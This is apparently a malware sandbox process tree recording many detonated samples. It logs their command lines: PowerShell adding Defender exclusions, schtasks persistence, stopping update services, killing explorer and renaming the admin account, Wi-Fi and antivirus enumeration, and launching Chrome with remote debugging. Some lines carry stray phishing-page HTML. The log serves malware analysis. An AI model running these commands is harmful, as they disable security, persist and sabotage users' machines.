    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7672
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9364
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6236
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7964
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3352
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c <!DOCTYPE html>     <html class="no-js" lang="en-US">  <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />  <style>body{margin:0;padding:0}</style>  <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script>  </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <p> <a href="https://www.cloudflare.com/learning/acce
        5⤵
        
        PID:10596
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7404
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8864
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c ss-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="lemKaK.prIsYwA.5QdeGaP13Zt5NIf6HGkME5QRq7a0-1731967332-0.0.1.1-/json.php?token=ewogICJjcHVDb3JlcyI6ICI4IiwKICAidG90YWxNZW1vcnkiOiAiODE5MiBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIk9GR0FEVVNFIiwKICAib3NWZXJzaW9uIjogIk1pY3Jvc29mdCBXaW5kb3dzIDEwIiwKICAicHJvY2Vzc29yTmFtZSI6ICJJbnRlbCBDb3JlIFByb2Nlc3NvciAoQnJvYWR3ZWxsKSIsCiAgInN5c3RlbU1vZGVsIjogIlVua25vd24gTW9kZWwiLAogICJjb25maWd1cmF0aW9uIjogIjMiLAogICJ0b2tlbiI6ICJZb3VyX1NlY3JldF9Ub2tlbiIKfQ=="> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb
        5⤵
        
        PID:9188
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9908
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8052
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c -1">Cloudflare Ray ID: <strong class="font-semibold">8e4b3e547ebf418e</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">181.215.176.83</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div> </div> </div> <script> window._cf_translation = {}; </script> </body> </html>
        5⤵
        
        PID:11172
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7008
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5396
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6640
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7612
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9556
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5876
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8864
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9720
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6728
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3264
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5108
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9384
  - - C:\Users\Admin\Desktop\Files\ZZZ.exe
      "C:\Users\Admin\Desktop\Files\ZZZ.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4980
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 448
        5⤵
        Program crash
        
        PID:764
  - - C:\Users\Admin\Desktop\Files\Final.exe
      "C:\Users\Admin\Desktop\Files\Final.exe"
      4⤵
      PID:6632
    - - C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        5⤵
        
        PID:6828
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6844
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:6988
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6976
        
        C:\Windows\system32\findstr.exe
        
        findstr /R /C:"[ ]:[ ]"
        7⤵
        
        PID:6940
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
        6⤵
        
        PID:7440
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:7772
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        7⤵
        
        PID:6456
        
        C:\Windows\system32\findstr.exe
        
        findstr "SSID BSSID Signal"
        7⤵
        
        PID:4948
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe"
        6⤵
        
        PID:1204
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4004
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6864
  - - C:\Users\Admin\Desktop\Files\XClient.exe
      "C:\Users\Admin\Desktop\Files\XClient.exe"
      4⤵
      PID:1480
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3084
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Wave.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6716
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wave.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6180
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Wave" /tr "C:\Users\Admin\AppData\Roaming\Wave.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:336
  - - C:\Users\Admin\Desktop\Files\Windows.exe
      "C:\Users\Admin\Desktop\Files\Windows.exe"
      4⤵
      PID:7572
  - - C:\Users\Admin\Desktop\Files\1188%E7%83%88%E7%84%B0.exe
      "C:\Users\Admin\Desktop\Files\1188%E7%83%88%E7%84%B0.exe"
      4⤵
      PID:7288
  - - C:\Users\Admin\Desktop\Files\c2.exe
      "C:\Users\Admin\Desktop\Files\c2.exe"
      4⤵
      PID:8232
    - - C:\Windows\SYSTEM32\notepad.exe
        
        notepad.exe
        5⤵
        
        PID:8400
  - - C:\Users\Admin\Desktop\Files\postbox.exe
      "C:\Users\Admin\Desktop\Files\postbox.exe"
      4⤵
      PID:2864
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        5⤵
        
        PID:3480
  - - C:\Users\Admin\Desktop\Files\bundle.exe
      "C:\Users\Admin\Desktop\Files\bundle.exe"
      4⤵
      PID:1804
  - - C:\Users\Admin\Desktop\Files\twztl.exe
      "C:\Users\Admin\Desktop\Files\twztl.exe"
      4⤵
      PID:7380
    - - C:\Windows\sysppvrdnvs.exe
        
        C:\Windows\sysppvrdnvs.exe
        5⤵
        
        PID:2588
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        
        PID:8864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5056
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        6⤵
        
        PID:2676
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:8060
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:1812
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:7860
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        
        PID:8744
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        7⤵
        Launches sc.exe
        
        PID:9092
      - C:\Users\Admin\AppData\Local\Temp\659528809.exe
        
        C:\Users\Admin\AppData\Local\Temp\659528809.exe
        6⤵
        
        PID:9732
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
        8⤵
        
        PID:440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
        9⤵
        Modifies registry key
        
        PID:1040
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:9872
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager
        8⤵
        
        PID:5764
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /f /tn Windows Upgrade Manager
        9⤵
        
        PID:6232
      - C:\Users\Admin\AppData\Local\Temp\1805425042.exe
        
        C:\Users\Admin\AppData\Local\Temp\1805425042.exe
        6⤵
        
        PID:11260
      - C:\Users\Admin\AppData\Local\Temp\136072164.exe
        
        C:\Users\Admin\AppData\Local\Temp\136072164.exe
        6⤵
        
        PID:6736
      - C:\Users\Admin\AppData\Local\Temp\52263531.exe
        
        C:\Users\Admin\AppData\Local\Temp\52263531.exe
        6⤵
        
        PID:8332
  - - C:\Users\Admin\Desktop\Files\tpeinf.exe
      "C:\Users\Admin\Desktop\Files\tpeinf.exe"
      4⤵
      PID:9208
  - - C:\Users\Admin\Desktop\Files\meta.exe
      "C:\Users\Admin\Desktop\Files\meta.exe"
      4⤵
      PID:2212
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        5⤵
        
        PID:7060
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\chisel.exe"
      4⤵
      PID:2952
    - - C:\Users\Admin\Desktop\Files\chisel.exe
        
        C:\Users\Admin\Desktop\Files\chisel.exe
        5⤵
        
        PID:3124
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\SVC.exe"
      4⤵
      PID:7480
    - - C:\Users\Admin\Desktop\Files\SVC.exe
        
        C:\Users\Admin\Desktop\Files\SVC.exe
        5⤵
        
        PID:7420
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\DISCOR~1.EXE"
      4⤵
      PID:9992
    - - C:\Users\Admin\Desktop\Files\DISCOR~1.EXE
        
        C:\Users\Admin\Desktop\Files\DISCOR~1.EXE
        5⤵
        
        PID:9672
      - C:\Users\Admin\Desktop\Files\DISCOR~1.EXE
        
        C:\Users\Admin\Desktop\Files\DISCOR~1.EXE
        6⤵
        
        PID:9864
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\Indentif.exe"
      4⤵
      PID:9348
    - - C:\Users\Admin\Desktop\Files\Indentif.exe
        
        C:\Users\Admin\Desktop\Files\Indentif.exe
        5⤵
        
        PID:11204
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\343dsxs.exe"
      4⤵
      PID:1048
    - - C:\Users\Admin\Desktop\Files\343dsxs.exe
        
        C:\Users\Admin\Desktop\Files\343dsxs.exe
        5⤵
        
        PID:5852
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 252
        6⤵
        Program crash
        
        PID:7644
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4020
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\buildred.exe"
      4⤵
      PID:10888
    - - C:\Users\Admin\Desktop\Files\buildred.exe
        
        C:\Users\Admin\Desktop\Files\buildred.exe
        5⤵
        
        PID:6808
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\ASYNCC~1.EXE"
      4⤵
      PID:8284
    - - C:\Users\Admin\Desktop\Files\ASYNCC~1.EXE
        
        C:\Users\Admin\Desktop\Files\ASYNCC~1.EXE
        5⤵
        
        PID:6968
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\COOKIE~1.EXE"
      4⤵
      PID:2876
    - - C:\Users\Admin\Desktop\Files\COOKIE~1.EXE
        
        C:\Users\Admin\Desktop\Files\COOKIE~1.EXE
        5⤵
        
        PID:6300
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\nurik.exe"
      4⤵
      PID:164
    - - C:\Users\Admin\Desktop\Files\nurik.exe
        
        C:\Users\Admin\Desktop\Files\nurik.exe
        5⤵
        
        PID:9568
      - C:\Users\Admin\Desktop\Files\nurik.exe
        
        C:\Users\Admin\Desktop\Files\nurik.exe
        6⤵
        
        PID:7324
- - C:\Users\Admin\Desktop\4363463463464363463463463.exe
    "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3292
  - - C:\Users\Admin\Desktop\Files\PrintSpoofer.exe
      "C:\Users\Admin\Desktop\Files\PrintSpoofer.exe"
      4⤵
      Executes dropped EXE
      PID:880
  - - C:\Users\Admin\Desktop\Files\robotic.exe
      "C:\Users\Admin\Desktop\Files\robotic.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2892
  - - C:\Users\Admin\Desktop\Files\PctOccurred.exe
      "C:\Users\Admin\Desktop\Files\PctOccurred.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:5692
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:824
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:220
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2448
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:2328
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1408
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 193997
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1620
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "JulieAppMagneticWhenever" Hist
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:112
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4048
      - C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
        
        Restructuring.pif y
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1332
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:996
  - - C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe
      "C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4836
  - - C:\Users\Admin\Desktop\Files\25072023.exe
      "C:\Users\Admin\Desktop\Files\25072023.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      PID:4828
  - - C:\Users\Admin\Desktop\Files\surfex.exe
      "C:\Users\Admin\Desktop\Files\surfex.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3336
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4580
  - - C:\Users\Admin\Desktop\Files\000.exe
      "C:\Users\Admin\Desktop\Files\000.exe"
      4⤵
      PID:3440
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
        5⤵
        
        PID:4556
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:2328
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:6232
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic useraccount where name='Admin' set FullName='UR NEXT'
        6⤵
        
        PID:6788
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic useraccount where name='Admin' rename 'UR NEXT'
        6⤵
        
        PID:6928
  - - C:\Users\Admin\Desktop\Files\reverse_ctl.exe
      "C:\Users\Admin\Desktop\Files\reverse_ctl.exe"
      4⤵
      PID:7028
    - - C:\Users\Admin\Desktop\Files\reverse_ctl.exe
        
        "C:\Users\Admin\Desktop\Files\reverse_ctl.exe"
        5⤵
        
        PID:6308
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist | findstr /i "Geek_se.exe""
        6⤵
        
        PID:6340
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:6716
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "Geek_se.exe"
        7⤵
        
        PID:6812
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist | findstr /i "Geek_se.exe""
        6⤵
        
        PID:3504
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:6788
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "Geek_se.exe"
        7⤵
        
        PID:6264
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist | findstr /i "Geek_se.exe""
        6⤵
        
        PID:5368
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:7456
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "Geek_se.exe"
        7⤵
        
        PID:7568
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist | findstr /i "Geek_se.exe""
        6⤵
        
        PID:5476
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:3124
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "Geek_se.exe"
        7⤵
        
        PID:8660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist | findstr /i "Geek_se.exe""
        6⤵
        
        PID:5008
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:7876
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "Geek_se.exe"
        7⤵
        
        PID:7364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist | findstr /i "Geek_se.exe""
        6⤵
        
        PID:9932
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist | findstr /i "Geek_se.exe""
        6⤵
        
        PID:8944
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:10288
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "Geek_se.exe"
        7⤵
        
        PID:7420
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist | findstr /i "Geek_se.exe""
        6⤵
        
        PID:9632
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:9776
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "Geek_se.exe"
        7⤵
        
        PID:10592
  - - C:\Users\Admin\Desktop\Files\valid.exe
      "C:\Users\Admin\Desktop\Files\valid.exe"
      4⤵
      PID:8364
    - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\o0Z10.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\o0Z10.exe
        5⤵
        
        PID:4668
      - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\X8S22.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\X8S22.exe
        6⤵
        
        PID:9048
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1X49y4.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1X49y4.exe
        7⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        8⤵
        
        PID:7792
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 852
        9⤵
        Program crash
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2V1639.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2V1639.exe
        7⤵
        
        PID:6408
      - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3F43h.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3F43h.exe
        6⤵
        
        PID:5360
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:7516
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff9982dcc40,0x7ff9982dcc4c,0x7ff9982dcc58
        8⤵
        
        PID:10696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
